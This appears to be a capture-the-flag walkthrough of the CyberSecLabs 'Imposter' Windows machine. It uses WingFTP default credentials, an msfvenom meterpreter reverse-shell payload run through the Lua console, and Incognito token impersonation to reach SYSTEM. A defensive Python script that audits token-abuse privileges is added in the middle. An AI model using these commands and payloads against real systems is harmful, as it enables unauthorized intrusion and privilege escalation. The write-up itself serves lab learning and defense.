CyberSecLabs "Imposter" Walkthrough


Imposter, by CyberSecLabs, is another of their many recently released offerings.  Imposter is a Windows machine that has both a manual method and a Metasploit module available to gain access to the machine.  In order to fully exploit the machine I needed to spin up Metasploit to use the Incognito module.  So let's see how we do it!

Scanning

nmap 172.31.1.20


nmap -A 172.31.1.20

We have several ports open; however, the important ones to notice here are ports 21 and 8080.  Port 21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.

Enumeration & Exploitation

Enumeration begins with visiting the webpage, which we are actually able to log in to with the admin:password default credentials.  This quickly moves right into exploitation.

WingFTP login screen and Dashboard

Quickly poking around reveals that we are an administrative user and are able to create an FTP user, of which there currently are none.

User Creation

We've created a user and granted them complete access to the file system.  This is where the unintended exploit was discovered.  WingFTP is running as a low-privilege user; however, by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, including the Administrator directory, System32 files, etc.  This is completely unintended, and after researching for some time I was unable to find anything in the wild that suggests this exploit has been discovered before.  I'll be doing more research on this to determine if it's simply a misconfiguration (which it shouldn't be, due to user permissions on the underlying machine) or an actual zero-day exploit that's not yet been discovered.

Now back to our regularly scheduled walkthrough.

We've now created our user and can leverage it to gain access to the FTP service on the machine.  We'll first need to log in to it, then create a payload with msfvenom, and can then utilize the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.

ftp 172.31.1.20 login

User lian directory where we will place our exploit (notice we have RWX permissions on Administrator)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=5555 -f exe > pwn.exe

put pwn.exe file upload

Metasploit Multi Handler and Payload parameters

Reverse shell via Lua Console execution - os.execute('cmd.exe /c C://Users/lian/pwn.exe')

At this point we have Meterpreter shell access to the machine and are able to enumerate our current user.  We can do this using the win_privs module first, to determine what our privileges are on the system.

run post/windows/gather/win_privs

Notice that we hold privileges to delegate and impersonate tokens.  In order to make use of this, we can utilize the Incognito module in Meterpreter.

load incognito; list_tokens -u

We notice that the NT AUTHORITY\SYSTEM token is available as a delegation token, which we will impersonate with the impersonate_token command.

impersonate_token "NT AUTHORITY\SYSTEM"

With the token impersonated, all you have to do is snag the flags and complete the challenge.
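The privilege check that makes the Incognito step work (win_privs showing impersonation rights on the service account) is something a defender can audit directly. The following is an added example, not code from the original post: it parses `whoami /priv`-style output and flags the privileges that let a compromised service process act under another account's token. The sample output is constructed to resemble what a low-privilege FTP service account might report; it is not captured from the lab machine.

```python
import re
from typing import Dict, List

# Privileges that let a process obtain or act under another account's token.
# A service account holding these can be escalated to SYSTEM once the service
# itself is compromised, which is exactly what the Incognito step relies on.
TOKEN_ABUSE_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate any client token that connects to this process",
    "SeAssignPrimaryTokenPrivilege": "start processes under an arbitrary primary token",
    "SeDelegateSessionUserImpersonatePrivilege": "impersonate logged-on users' sessions",
    "SeDebugPrivilege": "open and read any process, including SYSTEM-owned ones",
    "SeTcbPrivilege": "act as part of the operating system (create tokens)",
}

# One privilege row of `whoami /priv`: name, free-text description, state.
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> Dict[str, str]:
    """Parse `whoami /priv` output into {privilege_name: state}."""
    privs: Dict[str, str] = {}
    for line in output.splitlines():
        m = _PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def risky_privileges(output: str) -> List[str]:
    """Token-abuse privileges present in the output, enabled or not:
    a disabled privilege can be re-enabled by the process that holds it."""
    return sorted(p for p in parse_whoami_priv(output) if p in TOKEN_ABUSE_PRIVILEGES)


# Constructed sample modelled on the columns whoami /priv prints (not real capture).
SAMPLE_FTP_SERVICE_ACCOUNT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for p in risky_privileges(SAMPLE_FTP_SERVICE_ACCOUNT):
        print(f"{p}: {TOKEN_ABUSE_PRIVILEGES[p]}")
```

Any hit on a service account that does not strictly need the privilege is a finding: the mitigation is to run the FTP service under a dedicated account stripped of those rights, so a shell in the service context has no SYSTEM token to impersonate.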

User and Administrator Flags

Final Thoughts

Coincidentally, I had done a similar machine a couple of weeks ago on VirtualHackingLabs that required manual exploitation of the WingFTP server, so I knew what to look for as soon as I saw this show up. All in all it's a really neat challenge; it reinforces the usage and strengths of token delegation and authorities, and how to exploit them to elevate privileges.
